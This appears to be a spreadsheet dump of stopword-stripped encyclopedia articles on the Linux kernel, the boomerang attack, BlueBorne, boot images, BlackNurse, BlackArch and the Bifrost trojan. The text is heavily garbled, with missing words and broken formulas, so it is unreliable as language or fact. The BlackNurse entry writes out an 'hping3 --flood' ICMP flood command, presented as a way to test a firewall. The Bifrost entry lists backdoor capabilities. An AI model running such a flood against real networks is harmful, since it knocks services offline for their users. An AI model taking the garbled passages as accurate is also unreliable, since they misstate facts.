starting ready. like feedback things people like/dislike minix, resembles somewhat (same physical layout file-system (due practical reasons) among things). i've currently ported bash(1.08) gcc(1.40), things seem work. this implies i'll something practical within months [...] free minix code, multi-threaded protable [sic] (uses task switching etc), probably never support anything at-harddisks, that's :-(. september 1991, torvalds prepared version 0.01 linux "ftp.funet.fi" server finnish university research network (funet). even executable since code still needed minix compilation play.on october 1991, torvalds announced first "official" version linux, version 0.02. point, linux able bash, gcc, utilities: [as] mentioned month ago, working free version minix-lookalike at-386 computers. finally reached stage even usable (though depending want), willing sources wider distribution. version 0.02...but i've successfully bash, gcc, gnu-make, gnu-sed, compress, etc. after that, despite limited functionality early versions, linux rapidly gained developers users. many people contributed code project, including developers minix community. time, project created many components required free unix replacement, operating system, kernel, hurd, incomplete. reason, soon adopted linux kernel well. berkeley software distribution freed legal encumbrances competing space free kernel.torvalds assigned version kernel indicate mainly testing intended productive use. version 0.11, released december 1991, first self-hosted linux, could compiled computer running kernel. when torvalds released version 0.12 february 1992, adopted general public license version (gplv2) previous self-drafted license, permitted commercial redistribution. contrast unix, source files linux freely available, including device drivers. initial success linux driven programmers testers across world. with support posix apis, libc that, whether needed, acts entry point kernel address space, linux could software applications developed unix. january 1992, first post newsgroup alt.os.linux submitted. march 1992, newsgroup renamed comp.os.linux. fact linux monolithic kernel rather microkernel topic debate andrew tanenbaum, creator minix, torvalds. tanenbaum–torvalds debate started 1992 usenet group comp.os.minix general discussion kernel architectures.linux version 0.95 first capable running window system. march 1994, linux 1.0.0 released 176,250 lines code. first version suitable production environments.it started versioning system kernel three four numbers separated dots first represented major release, second minor release, third revision. time odd-numbered minor releases development tests, whilst even numbered minor releases production. optional fourth digit indicated patches revision. development releases indicated ("release candidate") suffix. current version numbering slightly different above. even numbering dropped, specific major version indicated first numbers, taken whole. while time-frame open development next major, -rcn suffix used identify n'th release candidate next version. example, release version 4.16 preceded seven 4.16-rcn (from -rc1 -rc7). once stable release made, maintenance passed "stable team". occasional updates stable releases identified three numbering scheme (e.g., 4.13.1, 4.13.2, ..., 4.13.16).after version kernel, torvalds decided linux evolved enough warrant major number, released version 2.0.0 june 1996. series included releases. major feature support symmetric multiprocessing (smp) support types processors. starting version 2.0, linux configurable selecting specific hardware targets enabling architecture-specific features optimizations. make *config family commands kbuild used enable configure thousands options building kernel executables (vmlinux) loadable modules.version 2.2, released january 1999, improved locking granularity management, added m68k, powerpc, sparc64, alpha, 64-bit platforms support. furthermore, added file systems including microsoft's ntfs read-only capability. 1999, published patches linux 2.2.13 code support s/390 architecture.version 2.4.0, released january 2001, contained support plug play, usb, cards. linux added support pentium itanium (the latter introduced ia64 jointly developed intel hewlett-packard supersede older pa-risc), newer 64-bit mips processor. development 2.4.x changed features made available throughout duration series, including support bluetooth, logical volume manager (lvm) version raid support, intermezzo ext3 file systems. version 2.6.0 released december 2003. development 2.6.x changed towards including features throughout duration series. among changes made series are: integration µclinux mainline kernel sources, support, support several lines cpus, integration advanced linux sound architecture (alsa) mainline kernel sources, support users 216), support process (64-bit only, 32-bit arches still limited 215), substantially increased number device types number devices type, improved 64-bit support, support file systems support file sizes terabytes, in-kernel preemption, support native posix thread library (nptl), user-mode linux integration mainline kernel sources, selinux integration mainline kernel sources, infiniband support, considerably more. also notable addition wide selection file systems starting 2.6.x releases: now, kernel supports large number file systems, designed linux, like ext3, ext4, fuse, btrfs, others native operating systems like jfs, xfs, minix, xenix, irix, solaris, system windows ms-dos.in 2005 stable team formed response lack kernel tree people could work fixes, would keep updating stable versions. february 2008 linux-next tree created serve place patches aimed merged next development cycle gathered. several subsystem maintainers also adopted suffix -next trees containing code mean submit inclusion next release cycle. january 2014, in-development version linux held unstable branch named linux-next.linux used maintained without help automated source code management system until, 2002, development switched bitkeeper. freely available linux developers free software. 2005, efforts reverse-engineer company owned software revoked support linux community. response, torvalds others wrote git. system written within weeks, months first official kernel made using released.details history kernel series found changelog files kernel series source code release area kernel.org.the 20th anniversary linux celebrated torvalds july 2011 release 3.0.0 kernel version. version number years, uname26 personality reports 2.6.40+x added kernel programs would work.version released july 2011. 2011, torvalds announced change "nothing. absolutely nothing." asked, "...let's make sure really make next release shiny number, good kernel too." after expected weeks development process, would released near 20th anniversary linux. december 2012, torvalds decided reduce kernel complexity removing support i386 processors, making kernel series last still supporting original processor. series unified support processor.version 3.11, released september 2013, adds many features o_tmpfile flag open(2) reduce temporary file vulnerabilities, experimental radeon dynamic power management, low-latency network polling, zswap (compressed swap cache).the numbering change 2.6.39 3.0, 3.19 4.0, involved meaningful technical differentiation. major version number increased avoid large minor numbers. stable 3.x.y kernels released 3.19 february 2015. april 2015, torvalds released kernel version 4.0. february 2015, linux received contributions nearly 12,000 programmers 1,200 companies, including world's largest software hardware vendors. version linux, released june 2015, contains 19.5 million lines code contributed almost 14,000 programmers.a total 1,991 developers, first-time collaborators, added 553,000 lines code version 5.8, breaking record previously held version 4.9. according stack overflow's annual developer survey 2019, respondents developed software linux android, although develop linux-based operating systems.most websites linux-based operating systems, world's powerful supercomputers kind based linux.linux distributions bundle kernel system software (e.g., library, systemd, others unix utilities daemons) wide selection application software, usage share desktops comparison operating systems. android, accounts majority installed base operating systems mobile devices, responsible rising usage linux kernel, together wide large variety embedded devices. architecture features linux monolithic kernel modular design (e.g., insert remove loadable kernel modules runtime), supporting features available closed source kernels non-free operating systems. rest article makes unix unix-like operating systems convention official manual pages. numbers follow name commands, interfaces, features, purpose specifying section (i.e., type component feature) belong (e.g., execve(2) refers system call, exec(3) refers userspace library wrapper). following list subsequent sections describe non-comprehensive overview linux architectural design noteworthy features. concurrent computing (with availability enough cores tasks ready run) even true parallel execution many processes (each threads execution) numa architectures. selection configuration hundreds kernel features drivers (using make *config family commands, running compilation), modification kernel parameters booting (usually inserting instructions lines grub2 menu), fine tuning kernel behavior run-time (using sysctl(8) interface /proc/sys/). configuration (again using make *config commands) run-time modifications policies (via nice(2), setpriority(2), family sched_*(2) syscalls) task schedulers allow preemptive multitasking (both user mode and, since series, kernel mode); completely fair scheduler (cfs) default scheduler linux since 2007 uses red-black tree search, insert delete process information (task struct) o(log time complexity, number runnable tasks. advanced memory management paged virtual memory. inter-process communications synchronization mechanism. virtual filesystem several concrete filesystems (ext4, btrfs, xfs, jfs, fat32, many more). configurable schedulers, ioctl(2) syscall manipulates underlying device parameters special files standard system call, since arguments, returns, semantics depends device driver question), support posix asynchronous (however, scale poorly multithreaded applications, family linux specific system calls (io_*(2)) created management asynchronous contexts suitable concurrently processing). os-level virtualization (with linux-vserver), paravirtualization hardware-assisted virtualization (with xen, using qemu hardware emulation); hypervisor, linux kernel provides support build linux distributions (such opensuse leap many others) work dom0, virtual machine host servers provide management environment user's virtual machines (domu). virtualization vfio sr-iov. virtual function (vfio) exposes direct device access user space secure memory (iommu) protected environment. with vfio, guest directly access hardware devices host server. this technique improves performance, compared full virtualization paravirtualization. however, vfio, devices cannot shared multiple guests. single root virtualization (sr-iov) combines performance gains vfio ability share device several guests (but requires special hardware must capable appear guests different devices). security mechanisms discretionary mandatory access control (selinux, apparmor, posix acls, others). several types layered communication protocols (including internet protocol suite). asymmetric multiprocessing rpmsg subsystem.most device drivers kernel extensions kernel space (ring many architectures), full access hardware. some exceptions user space; notable examples filesystems based fuse/cuse, parts uio. furthermore, window system wayland, windowing system display server protocols people linux, within kernel. differently, actual interfacing gpus graphics cards in-kernel subsystem called direct rendering manager (drm). unlike standard monolithic kernels, device drivers easily configured modules, loaded unloaded system running also pre-empted certain conditions order handle hardware interrupts correctly better support symmetric multiprocessing. choice, linux stable device driver application binary interface.linux typically makes memory protection virtual memory also handle non-uniform memory access, however project absorbed μclinux also makes possible linux microcontrollers without virtual memory.the hardware represented file hierarchy. user applications interact device drivers entries /dev /sys directories. processes information well mapped file system /proc directory. interfaces linux clone unix, aims toward posix single unix specification compliance. kernel also provides system calls interfaces linux-specific. order included official kernel, code must comply licensing rules.the linux application binary interface (abi) kernel user space four degrees stability (stable, testing, obsolete, removed); however, system calls expected never change order break userspace programs rely them.loadable kernel modules (lkms), design, cannot rely stable abi. therefore, must always recompiled whenever kernel executable installed system, otherwise loaded. in-tree drivers configured become integral part kernel executable (vmlinux) statically linked building process. there also guarantee stability source-level in-kernel and, this, device drivers code, well code kernel subsystem, must kept updated kernel evolution. developer makes change required code breaks result change. kernel-to-userspace linux kernel regards interfaces exposed user applications fundamentally composed unix linux-specific system calls. system call entry point linux kernel. example, among linux-specific ones family clone(2) system calls. most extensions must enabled defining _gnu_source macro header file user-land code compiled.system calls invoked using assembly instructions enable transition unprivileged user space privileged kernel space ring reason, standard library (libc) acts wrapper linux system calls, exposing functions that, whether needed, transparently enter kernel execute behalf calling process. system calls exposed libc, e.g. fast userspace mutex (futex), library provides function called syscall(2) used explicitly invoke them.pseudo filesystems (e.g., sysfs procfs filesystems) special files (e.g., /dev/random, /dev/sda, /dev/tty, many others) constitute another layer interface kernel data structures representing hardware logical (software) devices. kernel-to-userspace because differences existing hundreds various implementations linux executable objects, even though compiled, assembled, linked running specific hardware architecture (that target hardware), often cannot different linux distributions. this issue mainly distribution-specific configurations patches applied code linux kernel, differences system libraries, services (daemons), filesystem hierarchies, environment variables. main standard concerning application binary compatibility linux distributions linux standard base (lsb). however, goes beyond concerns linux kernel, also defines desktop specifications, libraries little version built upon several standards drafts (posix, sus, x/open, file system hierarchy (fhs), others).the parts largely relevant kernel general (gabi), especially system executable linking format (elf), processor specific (psabi), example core specification x86-64.the standard x86_64 user programs invoke system calls load syscall number register, parameters rdi, rsi, rdx, r10, finally syscall assembly instruction code. in-kernel there several kernel internal apis utilized different subsystems. some available within kernel subsystems, somewhat limited in-kernel symbols (i.e., variables, data structures, functions) exposed also dynamically loadable modules (e.g., device drivers loaded demand) whether they're exported export_symbol() export_symbol_gpl() macros (the latter reserved modules released gpl-compatible license).linux provides in-kernel apis manipulate data structures (e.g., linked lists, radix trees, red-black trees, queues) perform common routines (e.g., copy data user space, allocate memory, print lines system log, remained stable least since linux version 2.6.in-kernel apis include libraries low-level common services used device drivers: scsi interfaces libata respectively, peer-to-peer packet based communication protocol storage devices attached usb, sata, sas, fibre channel, firewire, atapi device, in-kernel library support [s]ata host controllers devices. direct rendering manager (drm) kernel mode setting (kms) interfacing gpus supporting needs modern 3d-accelerated video hardware, setting screen resolution, color depth refresh rate buffers (dma-buf) sharing buffers hardware direct memory access across multiple device drivers subsystems video4linux video capture hardware advanced linux sound architecture (alsa) sound cards network interface controllers mac80211 cfg80211 wireless network interface controllers in-kernel linux developers chose maintain stable in-kernel abi. modules compiled specific version kernel cannot loaded another version without recompiled, assuming in-kernel remained source level; otherwise, module code must also modified accordingly. processes threads linux creates processes means clone(2) newer clone3(2) system calls. depending given parameters, entity share none resources caller. these syscalls create entities ranging independent processes (each special identifier called tgid within task_struct data structure kernel space, although identifier called userspace), threads execution within calling process using clone_thread parameter). latter case entity owns tgid calling process consequently also userspace.if executable dynamically linked shared libraries, dynamic linker (for objects, typically /lib/ld-linux.so.2) used find load needed objects, prepare program it.the native posix thread library, simply known nptl, provides standard posix threads interface (pthreads) userspace. whenever thread created using pthread_create(3) posix interface, clone(2) family system calls must also given address function thread must jump linux kernel provides futex(7) (acronym "fast user-space mutexes") mechanisms fast user-space locking synchronization; majority operations performed userspace necessary communicate kernel using futex(2) system call.a special category threads so-called kernel threads. they must confused above-mentioned threads execution user's processes. kernel threads exist kernel space purpose concurrently kernel tasks.differently, whenever independent process created, syscalls return exactly next instruction program, concurrently parent process child's (i.e., program, processes). different return values (one process) enable program know processes currently executing. programs need information child process, steps process duplication, usually invokes execve(2) system call (possibly family exec(3) wrapper functions glibc) replace program currently calling process program, newly initialized stack, heap, (initialized uninitialized) data segments. when done, results processes different programs. depending effective user (euid), effective group (egid), process running user zero privileges (root, system administrator, owns identifier perform everything (e.g., kill processes recursively wipe whole filesystems), instead zero user processes cannot. capabilities(7) divides privileges traditionally associated superuser distinct units, independently enabled disabled parent process dropped child itself. scheduling preemption linux scheduler modular, sense enables different scheduling classes policies. scheduler classes plugable scheduler algorithms registered base scheduler code. each class schedules different types processes. core code scheduler iterates class order priority chooses highest priority scheduler schedulable entity type struct sched_entity ready run. entities threads, group threads, even processes specific user. linux provides user preemption well full kernel preemption. preemption reduces latency, increases responsiveness, makes linux suitable desktop real-time applications. normal tasks, default, kernel uses completely fair scheduler (cfs) class, introduced 2.6.23 version kernel. internally default-scheduler class defined macro header sched_normal. posix kernels, similar policy known sched_other allocates timeslices (i.e, assigns absolute slices processor time depending either predetermined dynamically computed priority process). linux away absolute timeslices assigns fair proportion time, function parameters like total number runnable processes time already run; function also takes account kind weight depends relative priorities (nice values).with user preemption, kernel scheduler replace current process execution context switch different therefore acquires computing resources running (cpu, memory, more). makes according algorithm particular, uses variable called vruntime sorting entities chooses smaller vruntime, i.e., schedulable entity least share time), active scheduler policy relative priorities. with kernel preemption, kernel preempt interrupt handler returns, kernel tasks block, whenever subsystem explicitly calls schedule() function. kernel also contains posix-compliant real-time scheduling classes named sched_fifo (realtime first-in-first-out) sched_rr (realtime round-robin), take precedence default class. additional scheduling policy known sched deadline, implementing earliest deadline first algorithm (edf), added kernel version 3.14, released march 2014. sched_deadline takes precedence scheduling classes. real-time preempt_rt patches, included mainline linux since version 2.6, provide deterministic scheduler, removal preemption interrupts disabling (where possible), mutexes (i.e., locking primitives avoid priority inversion), support high precision event timers (hpet), preemptive read-copy-update, (forced) threads, minor features. concurrency synchronization kernel different causes concurrency (e.g., interrupts, bottom halves, preemption kernel users tasks, symmetrical multiprocessing). protecting critical regions (sections code must executed atomically), shared memory locations (like global variables data structures global scope), regions memory asynchronously modifiable hardware (e.g., volatile type qualifier), linux provides large tools. they consist atomic types (which manipulated specific operators), spinlocks, semaphores, mutexes, lockless algorithms (e.g., rcus). most lock-less algorithms built memory barriers purpose enforcing memory ordering prevent undesired side effects compiler optimization.preempt_rt code included mainline linux provide rt-mutexes, special kind mutex disable preemption support priority inheritance. almost locks changed sleeping locks using configuration realtime operation. priority inheritance avoids priority inversion granting low-priority task holds contended lock priority higher-priority waiter lock released.linux includes kernel lock validator called lockdep. interrupts management management interrupts, although could seen single job, divided separate parts. this split different time constraints synchronization needs tasks whose management composed first part made asynchronous interrupt service routine linux known half, second part carried three types so-called bottom halves (softirq, tasklets, work queues). linux interrupts service routines nested (i.e., trap high priority preempts lower priority isrs). memory management memory management linux complex topic. first all, kernel pageable (i.e., always resident physical memory cannot swapped disk). kernel memory protection sigsegv signals, unlike userspace), therefore memory violations lead instability system crashes.linux implements virtual memory 5-levels page tables. said, user memory space always pageable. maintains information page frame apposite data structures type struct page) populated immediately boots kept shutdown, regardless associated virtual pages. furthermore, classifies page frames zones, according architecture dependent constraints intended use. example, pages reserved operations zone_dma, pages permanently mapped virtual addresses zone_highmem x86_32 architecture zone physical addresses x86_64 need x86_64 permanently physical pages reside higher addresses), remains (with exception less used classifications) zone_normal. small chunks memory dynamically allocated family kmalloc() freed appropriate variant kfree(). vmalloc() kvfree() used large virtually contiguous chunks. alloc_pages() allocates desired number entire pages. kernel includes slab, slub slob allocators configurable alternatives. slub newest also default allocator. aims simplicity efficiency. slub made preempt_rt compatible. supported architectures while originally designed portable, linux widely ported operating system kernels, running diverse range systems architecture z/architecture mainframe computers. first port performed motorola 68000 platform. modifications kernel fundamental torvalds viewed motorola version fork "linux-like operating system". however, moved torvalds lead major restructure code facilitate porting computing architectures. first linux that, single source tree, code i386 alone, supported alpha 64-bit platform.linux runs main operating system ibm's summit; october 2019, world's fastest supercomputers operating system based linux kernel, change 1998 first linux supercomputer added list.linux also ported various handheld devices apple's iphone ipod. supported devices 2007, lkddb project started build comprehensive database hardware protocols known linux kernels. database built automatically static analysis kernel sources. later 2014, linux hardware project launched automatically collect database tested hardware configurations help users various linux distributions. live patching rebootless updates even applied kernel using live patching technologies ksplice, kpatch kgraft. minimalistic foundations live kernel patching merged linux kernel mainline kernel version 4.0, released april 2015. those foundations, known livepatch based primarily kernel's ftrace functionality, form common core capable supporting patching kgraft kpatch, providing application programming interface (api) kernel modules contain patches application binary interface (abi) userspace management utilities. however, common core included linux kernel supports architecture provide mechanisms ensuring function-level consistency patches applied. april 2015, ongoing work porting kpatch kgraft common live patching core provided linux kernel mainline. security kernel bugs present potential security issues. example, allow privilege escalation create denial-of-service attack vectors. over years, numerous bugs affecting system security found fixed. features frequently implemented improve kernel's security.capabilities(7) already introduced section processes threads. android makes systemd gives administrators detailed control capabilities processes.linux offers wealth mechanisms reduce kernel attack surface improve security collectively known linux security modules (lsm). they comprise security-enhanced linux (selinux) module, whose code originally developed released public nsa, apparmor among others. selinux actively developed maintained github. selinux apparmor provide support access control security policies, including mandatory access control (mac), though profoundly differ complexity scope. another security feature seccomp (secure computing berkeley packet filters) works filtering parameters reducing system calls available user-land applications.critics accused kernel developers covering security flaws, least announcing them; 2008, linus torvalds responded following: personally consider security bugs "normal bugs". cover also reason what-so-ever think good idea track announce something special...one reason refuse bother whole security circus think glorifies—and thus encourages—the wrong behavior. makes "heroes" security people, people normal bugs important. fact, boring normal bugs important, there's[sic] them. think spectacular security hole glorified cared "special" random spectacular crash locking. linux distributions typically release security updates vulnerabilities linux kernel. many offer long-term support releases receive security updates certain linux kernel version extended period time. development developer community community linux kernel developers comprises 5000–6000 members. according "2017 state linux kernel development", study issued linux foundation, covering commits releases 4.13, 1500 developers contributing 200-250 companies average. developers contributed little code. companies, contributors intel (13.1%) (7.2%), linaro (5.6%), (4.1%), second fifth places held 'none' (8.2%) 'unknown' (4.1%) categories. instead roadmap, technical guidelines. instead central resource allocation, persons companies stake development linux kernel, quite independently another: people like linus torvalds don’t plan kernel evolution. don’t think roadmap next years, assign resources various features. that's don’t resources. resources owned various corporations contribute linux, well various independent contributors there. it's people resources decide... many large open-source software projects, developers required adhere contributor covenant, code conduct intended address harassment minority contributors. additionally, prevent offense inclusive terminology within source code mandated. source code management linux development community uses manage source code. users clone latest version torvalds' tree git-clone(1) keep date using git-pull(1). contributions submitted patches, form text messages lkml (and often also mailing lists dedicated particular subsystems). patches must conform rules formal language that, among things, describes lines code deleted others added specified files. these patches automatically processed system administrators apply order make changes code incrementally upgrade next version. linux distributed also (gzip) bzip2 formats. submitting code kernel developer wants change linux kernel starts developing testing change. depending significant change many subsystems modifies, change either submitted single patch multiple patches source code. case single subsystem maintained single maintainer, patches sent e-mails maintainer subsystem appropriate mailing list maintainer readers mailing list review patches provide feedback. once review process finished subsystem maintainer accepts patches relevant kernel tree. changes linux kernel fixes considered important enough, pull request patches sent torvalds within days. otherwise, pull request sent torvalds next merge window. merge window usually lasts weeks starts immediately release previous kernel version. kernel source tree names developers contributed linux kernel credits directory subsystem maintainers listed maintainers. programming language coding style linux written special programming language supported </t>
  </si>
  <si>
    <t>Boomerang attack</t>
  </si>
  <si>
    <t>cryptography, boomerang attack method cryptanalysis block ciphers based differential cryptanalysis. attack published 1999 david wagner, used break coconut98 cipher. boomerang attack allowed avenues attack many ciphers previously deemed safe differential cryptanalysis. refinements boomerang attack published: amplified boomerang attack, rectangle attack. similarity merkle–damgård construction block cipher, attack also applicable certain hash functions md5. attack boomerang attack based differential cryptanalysis. differential cryptanalysis, attacker exploits differences input cipher (the plaintext) affect resultant difference output (the ciphertext). high-probability "differential" (that input difference produce likely output difference) needed covers all, nearly all, cipher. boomerang attack allows differentials used cover part cipher. attack attempts generate so-called "quartet" structure point halfway cipher. purpose, encryption action, cipher split consecutive stages, e(m) e1(e0(m)), plaintext message. suppose differentials stages; say, {\displaystyle \delta \delta ^{*}} {\displaystyle \nabla \nabla ^{*}} e1−1 (the decryption action e1).the basic attack proceeds follows: choose random plaintext {\displaystyle calculate {\displaystyle p'=p\oplus \delta request encryptions {\displaystyle {\displaystyle obtain {\displaystyle c=e(p)} {\displaystyle c'=e(p')} calculate {\displaystyle d=c\oplus \nabla {\displaystyle d'=c'\oplus \nabla request decryptions {\displaystyle {\displaystyle obtain {\displaystyle q=e^{-1}(d)} {\displaystyle q'=e^{-1}(d')} compare {\displaystyle {\displaystyle differentials hold, {\displaystyle q\oplus q'=\delta application specific ciphers attack kasumi, block cipher used 3gpp, related-key rectangle attack breaks full eight rounds cipher faster exhaustive search (biham al., 2005). attack requires 254.6 chosen plaintexts, encrypted four related keys, time complexity equivalent 276.1 kasumi encryptions. references external links boomerang attack explained john savard</t>
  </si>
  <si>
    <t>BlueBorne (security vulnerability)</t>
  </si>
  <si>
    <t>blueborne type security vulnerability bluetooth implementations android, ios, linux windows. affects many electronic devices laptops, smart cars, smartphones wearable gadgets. example cve-2017-14315. vulnerabilities first reported armis, security firm, september 2017. according armis, "the blueborne attack vector potentially affect devices bluetooth capabilities, estimated billion devices today [2017]." history blueborne security vulnerabilities first reported armis, security firm, september 2017. technical information blueborne vulnerabilities separate vulnerabilities. they broken groups based upon platform type. there vulnerabilities found bluetooth code android, ios, linux windows platforms: linux kernel vulnerability cve-2017-1000251 linux bluetooth stack (bluez) information leak vulnerability cve-2017-1000250 android information leak vulnerability cve-2017-0785 android vulnerability cve-2017-0781 android vulnerability cve-2017-0782 bluetooth pineapple android logical flaw cve-2017-0783 bluetooth pineapple windows logical flaw cve-2017-8628 apple energy audio protocol vulnerability cve-2017-14315the vulnerabilities mixture information leak vulnerabilities, remote code execution vulnerability logical flaw vulnerabilities. apple vulnerability remote code execution vulnerability implementation leap (low energy audio protocol). this vulnerability present older versions apple ios. impact 2017, blueborne estimated potentially affect billion bluetooth devices worldwide, although clarify billion bluetooth devices risk. many devices affected, including laptops, smart cars, smartphones wearable gadgets.in 2018, year original disclosure, armis estimated billion devices still vulnerable. mitigation google provides blueborne vulnerability scanner armis android. procedures help protect devices blueborne security vulnerabilities reported september 2017. references external links official website</t>
  </si>
  <si>
    <t>Boot image</t>
  </si>
  <si>
    <t>boot image type disk image computer file containing complete contents structure storage medium). when transferred onto boot device allows associated hardware boot.the boot image usually includes operating system, utilities diagnostics, well boot data recovery information. also includes "applications" used organization-wide. specialized image particular type user department called typically departmental boot image. building image take days weeks, involve complex decisions licensing permissions including passwords store boot image require users type requires experts software integration however, built, boot image simply copied onto devices, patched within reasonable limits, remains disposable case problems (viruses particular). this possible unlike hard drive images (which contain data, al.), pure boot images contain mission-critical data. definition pure boot image contains data cannot reproduced configurations off-the-shelf executables. particular end-user data part boot image, although operating systems require copy user preferences configuration files kept within boot image itself, e.g. microsoft windows registry. utilities like norton ghost keep backup copy boot image, quick re-imaging (often called re-installation) event problem, thus avoiding need diagnose specific problem specific machine. virtual machine some virtual machine infrastructure directly import export boot image direct installation "bare metal", i.e. disk. this standard technique oems install identical copies operating system many identical machines: boot image created virtual machine exported, created disk copied boot image control infrastructure also makes virtual machine copies. vmware vcenter converter instance lets users "convert physical machines virtual machines free" part company's suite products make images easier back manage. equivalents exist systems. goals keeping boot image entirely separate disposable, mandating boot image control, organizations seek keep total cost operations (including total cost ownership component) low. often organizations look uptime service. goal boot image control minimize number boot images used organization reduce support costs. includes least: specifying machine hardware minimize unneeded machine diversity minimize resultant number boot images. upgrading machine specifications additional cost ensures remain useful long past normal life. extending life desktop machines reduce incursion off-spec machines later life-cycle, improving standardization, reducing support costs, minimizing e-waste. organizing network boot images efficiently supported, independent data. data must dependent boot devices. networks store data secure servers. hardware acceptance testing machine confirms standardized boot image environment. boot image installation ensure supportable standardized boot images used. troubleshooting help desk functions employ standardized tests identify source problems: boot, software, hardware. desktop system recovery tools procedures failed desktop units. these would backup copies boot image created utilities norton ghost. large organization many compatible machines, rapid recovery replacing backup boot image take minutes, considerable cost savings. data backup recovery procedures ensure data stored right place recovered promptly crisis situations. installing services disabled single boot image manner ubiquitous cost effective, meeting needs staff regardless disability, available technology services. remote work secure off-site system access procedures. facilitating worker transfer changing boots authorizations instead moving machines. using thin clients off-spec machines eliminate need special boot images.many organizations thin clients applications require high security, involve unreliable users repurpose older machines continued use. cascading strategy involves re-imaging older, off-spec machines thin client boot images continue less demanding access-controlled applications. references also disk image disk cloning torito (cd-rom standard) protected area time interface extension services (parties) floppy disk hard drive bootup</t>
  </si>
  <si>
    <t>BlackNurse</t>
  </si>
  <si>
    <t>blacknurse attack form denial service attack based icmp flooding. attack special modest bandwidth 20mbit/s effective disrupting victim's network.the attack consists sending destination unreachable packets destination. this works packets caused destination consume resources relatively high rate relative traffic. discovery attack first discovered researchers lenny hansson kenneth bjerregard jørgensen security operations center danish telecom operator tdc. researchers goal protect customers telecom network ddos attacks cyber threats.the team noted release attack: blacknurse attack attracted attention, anti-ddos solution experienced even though traffic speed packets second low, attack could keep customers' operations down. this even applied customers large internet uplinks large enterprise firewalls place. expected professional firewall equipment would able handle attack. attacks denial service typically accomplished flooding targeted machine resource superfluous requests attempt overload systems prevent legitimate requests fulfilled. commonly, attack done distributed manner, many clients send requests given server. client's traffic often enough overwhelm destination cause service offline become unavailable. attack case blacknurse attack, instead flooding remote system's internet traffic superfluous traffic, attack takes advantage imbalance resources required send traffic resources required process namely, blacknurse attacks uses icmp type code packets. this packet meant sent destination's port unreachable.unlike previous attacks using icmp protocol--smurf attack, ping flood, ping death--blacknurse flood destination traffic. instead, researchers realized "destination port unreachable" packet causes high usage firewall processes using relatively small bandwidth 15-18mbit/s, attacker cause usage spike target firewall, causing firewall become unable process requests. determining vulnerability test device vulnerable, send icmp packet network using following commands. recommended commands side firewall. hping3 &lt;target hping3 --flood &lt;target ip&gt;while running test, attempt network normally watching usage firewall. reasons efficacy because history icmp attacks (like smurf attack, ping flood, ping death), many icmp packets commonly blocked firewalls. however icmp packets necessary allow network work properly. destination port unreachable packets required.typically however, attack effective incoming traffic greater bandwidth victim machine. case blacknurse however, attack takes advantage processing logic many firewalls handling traffic. this attack important leverages necessary component internet traffic require botnet execute attacks. impact cost attack, bandwidth connections common, attack used effectively. original researchers noted attack currently used clients network. origins name attack named blacknurse joke principal researchers former blacksmith former nurse. media picked name could changed. references external links official website list vulnerable devices</t>
  </si>
  <si>
    <t>BlackArch</t>
  </si>
  <si>
    <t>blackarch penetration testing distribution based arch linux provides large amount cyber security tools. open-source distro created specially penetration testers security researchers. repository contains 2800 tools installed individually groups. blackarch linux compatible existing arch linux installs. overview blackarch similar usage parrot kali linux fully installed, major difference blackarch based arch linux instead debian. blackarch provides xfce desktop environment "slim iso" provides multiple preconfigured window managers "full iso". similar kali linux parrot blackarch burned image live system. blackarch also installed unofficial user repository current arch linux installation. packages blackarch currently contains 2811 packages tools, along dependencies. blackarch developed small number cyber security specialists researchers packages well dependencies needed tools. tools categories within blackarch distribution (counting date: june 2022): blackarch-anti-forensic: tools2) blackarch-automation: tools3) blackarch-automobile: tools4) blackarch-backdoor: tools5) blackarch-binary: tools6) blackarch-bluetooth: tools7) blackarch-code-audit: tools8) blackarch-cracker: tools9) blackarch-crypto: tools10) blackarch-database: tools11) blackarch-debugger: tools12) blackarch-decompiler: tools13) blackarch-defensive: tools14) blackarch-disassembler: tools15) blackarch-dos: tools16) blackarch-drone: tools17) blackarch-exploitation: tools18) blackarch-fingerprint: tools19) blackarch-firmware: tools20) blackarch-forensic: tools21) blackarch-fuzzer: tools22) blackarch-hardware: tools23) blackarch-honeypot: tools24) blackarch-ids: tool25) blackarch-keylogger: tools26) blackarch-malware: tools27) blackarch-misc: tools28) blackarch-mobile: tools29) blackarch-networking: tools30) blackarch-nfc: tool31) blackarch-packer: tools32) blackarch-proxy: tools33) blackarch-radio: tools34) blackarch-recon: tools35) blackarch-reversing: tools36) blackarch-scanner: tools37) blackarch-sniffer: tools38) blackarch-social: tools39) blackarch-spoof: tools40) blackarch-stego: tools41) blackarch-tunnel: tools42) blackarch-voip: tools43) blackarch-webapp: tools44 blackarch-windows: tools45) blackarch-wireless: tools46) checker: tool47) find advanced information username, website, phone number, etc: tool46) uncategorized tools: tools; didier-stevens-suite, python-search-engine-parser, python-yara-rednaga references external links official website blackarch installation development guide blackarch linux downloads blackarch distrowatch page</t>
  </si>
  <si>
    <t>Bifrost (Trojan horse)</t>
  </si>
  <si>
    <t>bifrost backdoor trojan horse family variants infect windows windows (although modern windows systems, windows functionality limited). bifrost uses typical server, server builder, client backdoor program configuration allow remote attacker, uses client, execute arbitrary code compromised machine (which runs server whose behavior controlled server editor). server component (sized around 20–50 kilobytes, depending variant) dropped c:\program files\bifrost\server.exe default settings and, running, connects predefined address port awaiting commands remote user uses client component. however, installation directory port changed. connection encrypted password (default: "pass"), changed well. assumed three components operational, remote user execute arbitrary code compromised machine. server components also dropped c:\windows file attributes changed "read only" "hidden". casual users directories default "hidden" attributes directory. some anti-virus programs (example 17th 2010) seem miss file entirely. server builder component following capabilities: create server component change server component's port number and/or address change server component's executable name change name windows registry startup entry include rootkit hide server processes include extensions features (adds 22,759 bytes server) persistence (makes server harder remove infected system)the client component following capabilities: process manager (browse kill running processes) file manager (browse, upload, download, delete files) window manager (browse, close, maximize/minimize, rename windows) system information extract passwords machine keystroke logging screen capture webcam capture desktop logoff, reboot shutdown registry editor remote shellon december 2005, windows exploit used drop variants bifrost machines. some workarounds unofficial patches published microsoft announced issued official patch january 2006. exploit considered extremely dangerous. older variants bifrost used different ports, e.g. 1971, 1999; different payload, e.g. c:\winnt\system32\system.exe; and/or wrote different windows registry keys. bifrost designed introduction thus bifrost cannot install modern windows systems, unless launched administrator privileges. also windows metafile vulnerability external links backdoor-cep, mcafee, covers server behavior bifrost variant dropped exploit backdoor-cep.cfg, mcafee, covers client server editor behavior said bifrost variant backdoor-cka, mcafee backdoor.bifrose, symantec backdoor.bifrose.c, symantec troj/bifrose-aj, sophos</t>
  </si>
  <si>
    <t>Binary Modular Dataflow Machine</t>
  </si>
  <si>
